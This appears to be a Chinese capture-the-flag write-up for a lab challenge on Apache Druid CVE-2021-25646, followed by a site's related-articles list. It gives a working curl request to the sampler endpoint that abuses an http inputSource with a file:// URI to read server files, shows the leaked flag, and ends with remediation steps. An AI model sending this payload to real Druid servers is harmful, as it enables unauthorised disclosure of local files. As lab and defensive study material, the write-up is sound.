玄机靶场—Apache-druid(CVE-2021-25646) WP

YaBingSec2026-04-27 9:23

Apache-druid(CVE-2021-25646) 通关笔记

题目信息

  • 平台:玄机靶场
  • 题目 ID:197
  • 难度:简单
  • 积分:300 分
  • 类型:渗透
  • 漏洞编号:CVE-2021-25646

漏洞背景

Apache Druid 0.20.0 及以前版本中,/druid/indexer/v1/sampler 接口的 ioConfig.inputSource 支持多种数据源类型,包括 http 类型。该类型允许从指定 URI 拉取数据,而未对 file:// 协议进行限制,导致攻击者可以通过 file:///path/to/file 读取服务器本地任意文件。

虽然题目描述的是 JavaScript RCE(通过 javascript 类型的 filter/aggregator 执行任意 JS 代码),但本靶场环境中 JavaScript 功能被配置禁用(druid.javascript.enabled 未设置为 true),因此改用 http inputSource + file:// 协议实现任意文件读取。

靶机信息

  • IP:52.83.246.206
  • 端口:8888(Druid Router/Web Console)
  • 版本:Apache Druid 0.20.0

利用过程

步骤 1:确认服务版本

bash 复制代码 
curl -s "http://52.83.246.206:8888/status"

响应确认版本为 0.20.0,属于漏洞版本范围。

步骤 2:尝试 JavaScript RCE(失败)

通过 /druid/indexer/v1/sampler 发送包含 javascript 类型 filter 的 payload,服务器返回:

复制代码 
HTTP ERROR 500 java.lang.IllegalStateException: JavaScript is disabled

说明 druid.javascript.enabled 未启用,JavaScript 执行路径不可用。

步骤 3:改用 file:// 协议读取文件

利用 http 类型 inputSource 支持 file:// 协议的特性,直接读取 /flag.txt

bash 复制代码 
curl -s -X POST "http://52.83.246.206:8888/druid/indexer/v1/sampler" \
  -H "Content-Type: application/json" \
  -d '{
    "type": "index",
    "spec": {
      "type": "index",
      "ioConfig": {
        "type": "index",
        "inputSource": {
          "type": "http",
          "uris": ["file:///flag.txt"]
        },
        "inputFormat": {"type": "regex", "pattern": "(.*)", "columns": ["line"]}
      },
      "dataSchema": {
        "dataSource": "test",
        "timestampSpec": {"missingValue": "2021-01-01T00:00:00.000Z"},
        "dimensionsSpec": {"dimensions": ["line"]},
        "metricsSpec": [],
        "granularitySpec": {"type": "uniform", "segmentGranularity": "DAY", "queryGranularity": "NONE", "rollup": false}
      }
    },
    "samplerConfig": {"numRows": 10, "timeoutMs": 10000}
  }'

步骤 4:获取 FLAG

响应内容:

json 复制代码 
{"numRowsRead":1,"numRowsIndexed":1,"data":[{"input":{"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"},"parsed":{"__time":1609459200000,"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"}}]}

FLAGflag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

Flag 汇总

步骤 内容 Flag
步骤1 读取 /flag.txt flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

修复建议

  1. 升级 Apache Druid 至 0.21.0 或更高版本。
  2. 若无法升级,在 common.runtime.properties 中确保 druid.javascript.enabled=false(默认值)。
  3. http 类型 inputSource 的 URI 进行白名单校验,禁止 file://jar:// 等本地协议。
  4. 部署网络访问控制,限制 Druid 管理端口(8888/8081/8090)的外部访问。
相关推荐
少控科技2 小时前
小数典应用:农场环境数据采集监控
开发语言·windows·c#
叶小鸡2 小时前
Java 篇-项目实战-天机学堂(从0到1)-day7
java·开发语言
原来是猿2 小时前
Linux线程同步与互斥(五):线程池的全面实现
linux·服务器·开发语言
何中应2 小时前
记录一次Jenkins构建任务的坑
java·servlet·jenkins
eqwaak02 小时前
PyTorch入门:10分钟搭建首个神经网络
开发语言·人工智能·pytorch·python
雪碧聊技术2 小时前
上午题_计算机系统
java·开发语言
纤纡.2 小时前
解锁 Python 实用编程技巧:线程、视觉识别、正则匹配与装饰器实战
开发语言·python·深度学习·opencv
Hello--_--World2 小时前
React:状态管理 官网笔记
前端·笔记·react.js
jinanwuhuaguo2 小时前
生态融合与基座成型——OpenClaw v2026.4.24 的功能完备性跃迁与基础设施化拐点(第七篇)
人工智能·安全·架构·kotlin·openclaw
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026年AI前瞻:量子AI、具身智能与科学发现的新纪元052026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元06codex app每次打开重连5次Reconnecting问题解决07AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析082026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot09DeepSeek V4 全面解析:测评、对比、案例及实操指南102026 年 AI 辅助编程工具全景对比:Copilot、Cursor、Claude Code 与 Codex 深度解析